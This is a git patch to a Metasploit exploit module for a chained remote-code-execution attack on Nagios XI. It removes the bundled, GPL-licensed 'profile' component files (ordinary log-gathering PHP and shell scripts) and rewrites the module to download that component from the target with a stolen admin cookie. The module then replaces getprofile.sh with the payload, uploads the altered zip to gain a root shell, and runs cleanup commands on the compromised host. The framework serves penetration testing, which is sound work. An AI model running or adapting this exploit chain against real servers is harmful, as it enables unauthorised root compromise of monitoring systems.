From 9663f88fdc991f7e407ed3576fffec5ee8175e31 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 30 Jun 2016 23:07:04 -0500 Subject: [PATCH] Download profile.zip instead of including it profile.zip is GPL-licensed... --- data/exploits/nagios_xi/profile.zip | Bin 5511 -> 0 bytes data/exploits/nagios_xi/profile/CHANGES.txt | 9 - data/exploits/nagios_xi/profile/getprofile.sh | 64 ---- .../nagios_xi/profile/profile.inc.php | 106 ------- data/exploits/nagios_xi/profile/profile.php | 298 ------------------ .../linux/http/nagios_xi_chained_rce.rb | 101 ++++-- 6 files changed, 67 insertions(+), 511 deletions(-) delete mode 100644 data/exploits/nagios_xi/profile.zip delete mode 100644 data/exploits/nagios_xi/profile/CHANGES.txt delete mode 100644 data/exploits/nagios_xi/profile/getprofile.sh delete mode 100644 data/exploits/nagios_xi/profile/profile.inc.php delete mode 100644 data/exploits/nagios_xi/profile/profile.php diff --git a/data/exploits/nagios_xi/profile.zip b/data/exploits/nagios_xi/profile.zip deleted file mode 100644 index 1f51d7f49c28b9cfea5e642be36dfe703042c6ca..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 5511 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 b_P?@H2V-FV{8RwO&*KyY0C@G6f(rN_@9ze6 diff --git a/data/exploits/nagios_xi/profile/CHANGES.txt b/data/exploits/nagios_xi/profile/CHANGES.txt deleted file mode 100644 index e3eabb5fd6..0000000000 --- a/data/exploits/nagios_xi/profile/CHANGES.txt +++ /dev/null @@ -1,9 +0,0 @@ -02-19-2013 1.2 ------------- -- Added New functionality to download LOG files and latest snapshots in a zip for support. - SL -- Added ps -aef to the log list - SL - - -08-28-2012 1.1 ----------- -- Added XI Version -SW diff --git a/data/exploits/nagios_xi/profile/getprofile.sh b/data/exploits/nagios_xi/profile/getprofile.sh deleted file mode 100644 index a2ccb60732..0000000000 --- a/data/exploits/nagios_xi/profile/getprofile.sh +++ /dev/null @@ -1,64 +0,0 @@ -#!/bin/bash - - -echo "-------------------Fetching Information-------------------" - -echo "Please wait......." - -tail -100 /usr/local/nagios/var/nagios.log &> /usr/local/nagiosxi/var/components/profile/nagios.txt; - -echo "Creating nagios.txt..."; - -tail -100 /usr/local/nagios/var/perfdata.log &> /usr/local/nagiosxi/var/components/profile/perfdata.txt; - -echo "Creating perfdata.txt..."; - -tail -100 /usr/local/nagios/var/npcd.log &> /usr/local/nagiosxi/var/components/profile/npcd.txt; - -echo "Creating npcd.txt..."; - -tail -100 /usr/local/nagiosxi/var/cmdsubsys.log > /usr/local/nagiosxi/var/components/profile/cmdsubsys.txt; - -echo "Creating cmdsubsys.txt..."; - -tail -100 /usr/local/nagiosxi/var/eventman.log > /usr/local/nagiosxi/var/components/profile/eventman.txt; - -echo "Creating eventman.txt..."; - -############ We'll need a sudoers rule for these, only root can read them - -#tail -100 /var/log/messages > /usr/local/nagiosxi/var/components/profile/systemlog.txt; - -#echo "Creating systemlog.txt..."; - -#tail -100 /var/log/httpd/error_log > /usr/local/nagiosxi/var/components/profile/apacheerrors.txt; - -#echo "Creating apacheerrors.txt..."; - -#tail -100 /var/log/mysqld.log > /usr/local/nagiosxi/var/components/profile/mysqllog.txt; - -#echo "Creating mysqllog.txt..."; - -df -h > /usr/local/nagiosxi/var/components/profile/filesystem.txt; - -echo "Creating filesystem.txt..."; - -ps -aef > /usr/local/nagiosxi/var/components/profile/psaef.txt; - -echo "Dumping PS - AEF to psaef.txt..."; - -top -b -n 1 > /usr/local/nagiosxi/var/components/profile/top.txt; - -echo "Creating top log..."; - -FILE=$(ls /usr/local/nagiosxi/nom/checkpoints/nagioscore/ | sort -n -t _ -k 2 | grep .gz | tail -1); cp /usr/local/nagiosxi/nom/checkpoints/nagioscore/$FILE /usr/local/nagiosxi/var/components/profile/; - -echo "Adding latest snapshot to: `pwd`" - -## temporarily change to that directory, zip, then leave -( - cd /usr/local/nagiosxi/var/components/ && zip -r profile.zip profile -) -echo "Zipping logs directory..."; - -echo "Backup and Zip complete!"; diff --git a/data/exploits/nagios_xi/profile/profile.inc.php b/data/exploits/nagios_xi/profile/profile.inc.php deleted file mode 100644 index 1a20358e90..0000000000 --- a/data/exploits/nagios_xi/profile/profile.inc.php +++ /dev/null @@ -1,106 +0,0 @@ -".gettext("Error: This component requires Nagios XI 20011R1.1 or later.").""; - - //all components require a few arguments to be initialized correctly. - $args=array( - - // need a name - COMPONENT_NAME => $profile_component_name, - COMPONENT_VERSION => '1.1', - COMPONENT_DATE => '8/28/2012', - - // informative information - COMPONENT_AUTHOR => "Nagios Enterprises, LLC", - COMPONENT_DESCRIPTION => $desc, - COMPONENT_TITLE => "System Profile", - - ); - - //register this component with XI - register_component($profile_component_name,$args); - - // register the addmenu function - if($versionok) - register_callback(CALLBACK_MENUS_INITIALIZED,'profile_component_addmenu'); - } - - - - -/////////////////////////////////////////////////////////////////////////////////////////// -// MISC FUNCTIONS -/////////////////////////////////////////////////////////////////////////////////////////// - -function profile_component_checkversion(){ - - if(!function_exists('get_product_release')) - return false; - //requires greater than 2011R1 - if(get_product_release()<201) - return false; - - return true; - } - -function profile_component_addmenu($arg=null){ - global $profile_component_name; - //retrieve the URL for this component - $urlbase=get_component_url_base($profile_component_name); - //figure out where I'm going on the menu - $mi=find_menu_item(MENU_ADMIN,"menu-admin-managesystemconfig","id"); - if($mi==null) //bail if I didn't find the above menu item - return; - - $order=grab_array_var($mi,"order",""); //extract this variable from the $mi array - if($order=="") - return; - - $neworder=$order+0.1; //determine my menu order - - //add this to the main home menu - add_menu_item(MENU_ADMIN,array( - "type" => "link", - "title" => "System Profile", - "id" => "menu-admin-profile", - "order" => $neworder, - "opts" => array( - //this is the page the menu will actually point to. - //all of my actual component workings will happen on this script - "href" => $urlbase."/profile.php", - ) - )); - - } - - -?> \ No newline at end of file diff --git a/data/exploits/nagios_xi/profile/profile.php b/data/exploits/nagios_xi/profile/profile.php deleted file mode 100644 index 21b917c311..0000000000 --- a/data/exploits/nagios_xi/profile/profile.php +++ /dev/null @@ -1,298 +0,0 @@ - tags with newlines - $tags = array('

','

','
','
','
','
'); - $nls = array("\n====","====\n\n","\n===","====\n\n","\n\n","\n\n"); - $content= str_replace($tags,$nls,$content); - //return $content; - } - } - -} - -function build_profile_output($text) { - global $content; - - $content .= "

Nagios XI Installation Profile

"; - - if(!$text) { - $content .="
"; - $content .=" Download Profile"; - $content .="
"; - } - - //SYSTEM - show_system_settings(); - - - - //SERVER INFO - show_apache_settings(); - - //TIME STUFF - show_time_settings(); - - //XI Specific Data - show_xi_info(); - - //subsystem calls - run_subsystem_tests(); - - -} - - - -function show_system_settings() { - - global $content; - - $profile = php_uname('n'); - $profile .= ' '.php_uname('r'); - $profile .= ' '.php_uname('m'); - exec('which gnome-session',$output,$gnome); - - $content .= "
System:
"; - $content .= "Nagios XI Version : ".get_product_version()."\n"; - $content .= "$profile\n"; - //detect distro and version - $file = @file_get_contents('/etc/redhat-release'); - if(!$file) - $file = @file_get_contents('/etc/fedora-release'); - if(!$file) - $file = @file_get_contents('/etc/lsb-release'); - - $content .= $file; - $content .= ($gnome > 0) ? "Gnome is not installed\n" : " Gnome Installed\n"; - - if(check_for_proxy()) $content.= "Proxy appears to be in use\n"; - -} - - -function show_apache_settings() -{ - global $content; - - $content .= "
Apache Information
"; - $content .= "PHP Version: ".PHP_VERSION."\n"; - $content .= "Agent: ".$_SERVER['HTTP_USER_AGENT']."\n"; - $content .= "Server Name: ".$_SERVER['SERVER_NAME']."\n"; - $content .= "Server Address: ".$_SERVER['SERVER_ADDR']."\n"; - $content .= "Server Port: ".$_SERVER['SERVER_PORT']."\n"; -} - - -function show_time_settings() { - - global $content; - - $php_tz = (ini_get('date.timezone') == '') ? 'Not set' : ini_get('date.timezone'); - $content .= "
Date/Time
"; - $content .= "PHP Timezone: $php_tz \n"; - $content .= "PHP Time: ".date('r')."\n"; - $content .= "System Time: ".exec('/bin/date -R')."\n"; - -} - - -function show_xi_info() { - global $content; - - //systats - $xml = get_xml_sysstat_data(); - $statdata = ''; - //daemons - foreach($xml->daemons->daemon as $d) { - $statdata .= "{$d->output}\n"; - } - //hostcount - $result = (exec_sql_query(DB_NDOUTILS,"SELECT COUNT(*) FROM nagios_hosts")); - foreach($result as $r) $hostcount = $r[0]; - //servicecount - $result = exec_sql_query(DB_NDOUTILS,"SELECT COUNT(*) FROM nagios_services"); - foreach($result as $r) $servicecount = $r[0]; - //add to statdata string - $statdata .= "CPU Load 15: {$xml->load->load15} \n"; - $statdata .= "Total Hosts: $hostcount \n"; - $statdata .= "Total Services: $servicecount \n"; - - //content output - $content .= "
Nagios XI Data
"; - $content .= $statdata; - //url reference calls - $content .= "Function 'get_base_uri' returns: ".get_base_uri()."\n"; - $content .= "Function 'get_base_url' returns: ".get_base_url()."\n"; - $content .= "Function 'get_backend_url(internal_call=false)' returns: ".get_backend_url(false)."\n"; - $content .= "Function 'get_backend_url(internal_call=true)' returns: ".get_backend_url(true)."\n"; -} - - - -function check_for_proxy() { - - $proxy = false; - - $f = @fopen('/etc/wgetrc','r'); - if($f) { - while(!feof($f)) { - $line = fgets($f); - if($line[0]=='#') continue; - if(strpos($line,'use_proxy = on')!==FALSE) { - $proxy = true; - break; - } - } - } - - $proxy_env = exec('/bin/echo $http_proxy'); - if(strlen($proxy_env > 0)) $proxy = true; - return $proxy; - -} - - - -function run_subsystem_tests() { - - global $cfg; - global $content; - - //localhost ping resolve - $content .= "
Ping Test localhost
"; - $ping = '/bin/ping -c 3 localhost 2>&1'; - $content .= "Running: 
$ping
"; - $handle = popen($ping,'r'); - while(($buf = fgets($handle, 4096)) !=false) - $content .= $buf; - - pclose($handle); - - //get system info - $https=grab_array_var($cfg,"use_https",false); - $url=($https==true)?"https":"http"; - - //nagiosql resolve - $content .= "
Test wget To locahost
"; - $url.="://localhost".$cfg['component_info']['nagiosql']['direct_url']."/index.php"; - $content .= "WGET From URL: $url \n"; - $content .= "Running: 
/usr/bin/wget $url
"; - $handle = popen("/usr/bin/wget ".$url.' -O /tmp/nagiosql_index.tmp 2>&1', 'r'); - while(($buf = fgets($handle, 4096)) !=false) - $content .= $buf; - - pclose($handle); - -} - -function get_logs_and_snapshot() { - global $content; - //zip logs, latest snapshot, df -h, and top - exec('/bin/mkdir -p /usr/local/nagiosxi/var/components/profile',$output,$code); - - //dump existing profile into file - $profile = build_profile_output(true); - //str_replace tags with newlines - $tags = array('

','

','
','
','
','
'); - $nls = array("\n====","====\n\n","\n===","====\n\n","\n\n","\n\n"); - $content= str_replace($tags,$nls,$content); - file_put_contents('/usr/local/nagiosxi/var/components/profile/profile.txt',$profile); - - //get logs and config snapshot - exec('./getprofile.sh',$output,$code); - - //add sanity checking - if($code > 0 ) { - echo "PROFILE BUILD FAILED
\n"; - echo array_dump($output); //dump output where newlines are html breaks - echo "CODE: $code
"; - exit(); - } - - // zip was packaged, send it to user - $zip="/usr/local/nagiosxi/var/components/profile.zip"; - - //more sanity - if(!file_exists($zip)) { - echo "Failed to retrieve zip file!\n"; - exit(); - } - - //chdir($dir); - - $mime_type="application/zip"; - header('Content-type: '.$mime_type); - header("Content-length: " . filesize($zip)); - header('Content-Disposition: attachment; filename="'.basename($zip).'"'); - $f = file_get_contents($zip,'rb'); - //print binary output to browser - echo $f; - - //remove zip - unlink($zip); - -} -//ob_end_flush(); -?> diff --git a/modules/exploits/linux/http/nagios_xi_chained_rce.rb b/modules/exploits/linux/http/nagios_xi_chained_rce.rb index db52cb6b27..aef21befe8 100644 --- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb +++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb @@ -76,6 +76,8 @@ class MetasploitModule < Msf::Exploit::Remote print_status('Getting monitored host') get_monitored_host + print_status('Downloading component') + download_profile_component print_status('Uploading root shell') upload_root_shell print_status('Popping shell!') @@ -88,19 +90,22 @@ class MetasploitModule < Msf::Exploit::Remote def on_new_session(session) super + print_status('Cleaning up...') - cleanup_commands.each do |command| + + commands = [ + 'rm -rf ../profile', + 'unzip -qd .. ../../../../tmp/component-profile.zip', + 'chown -R nagios:nagios ../profile', + "rm -f ../../../../tmp/component-#{zip_filename}" + ] + + commands.each do |command| vprint_status(command) session.shell_command_token(command) end end - def cleanup_commands - ["base64 -d<<<#{encoded_getprofile}>../profile/getprofile.sh", - 'touch -r ../profile/{profile.php,getprofile.sh}', - "rm -f ../../../../tmp/component-#{zip_filename}"] - end - # # Exploit methods # @@ -174,13 +179,38 @@ class MetasploitModule < Msf::Exploit::Remote end end + def download_profile_component + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/nagiosxi/admin/components.php', + 'cookie' => @admin_cookie, + 'vars_get' => { + 'download' => 'profile' + } + ) + + if res && res.body =~ /^PK\x03\x04/ + @profile_component = res.body + else + fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!') + end + end + def upload_root_shell + mime = Rex::MIME::Message.new + mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"') + mime.add_part('1', nil, nil, 'form-data; name="upload"') + mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"') + mime.add_part(payload_zip, 'application/zip', 'binary', + 'form-data; name="uploadedfile"; ' \ + "filename=\"#{zip_filename}\"") + res = send_request_cgi!( 'method' => 'POST', 'uri' => '/nagiosxi/admin/components.php', 'cookie' => @admin_cookie, - 'ctype' => "multipart/form-data; boundary=#{mime_message.bound}", - 'data' => mime_message.to_s + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'data' => mime.to_s ) if res && res.code != 200 @@ -192,25 +222,6 @@ class MetasploitModule < Msf::Exploit::Remote end end - def mime_message - @mime ||= Rex::MIME::Message.new - @mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"') - @mime.add_part('1', nil, nil, 'form-data; name="upload"') - @mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"') - @mime.add_part(payload_zip, 'application/zip', 'binary', - 'form-data; name="uploadedfile"; ' \ - "filename=\"#{zip_filename}\"") - @mime - end - - def payload_zip - zip = Rex::Zip::Archive.new - zip.add_r(profile_dir) - zip.entries.delete_if { |e| e.name == 'profile/getprofile.sh' } - zip.add_file('profile/getprofile.sh', payload.encoded) - zip.pack - end - def pop_dat_shell send_request_cgi( 'method' => 'GET', @@ -224,16 +235,38 @@ class MetasploitModule < Msf::Exploit::Remote end # - # Utility methods + # Support methods # - def profile_dir - File.join(Msf::Config.data_directory, 'exploits', 'nagios_xi', 'profile') + def payload_zip + zip = Rex::Zip::Archive.new + + Zip::File.open_buffer(@profile_component) do |z| + z.each do |f| + zip.entries << Rex::Zip::Entry.new( + f.name, + (if f.ftype == :file + if f.name == 'profile/getprofile.sh' + payload.encoded + else + z.read(f) + end + else + '' + end), + Rex::Zip::CM_DEFLATE, + nil, + (Rex::Zip::EFA_ISDIR if f.ftype == :directory) + ) + end + end + + zip.pack end - def encoded_getprofile - Rex::Text.encode_base64(File.read(File.join(profile_dir, 'getprofile.sh'))) - end + # + # Utility methods + # def zip_filename @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'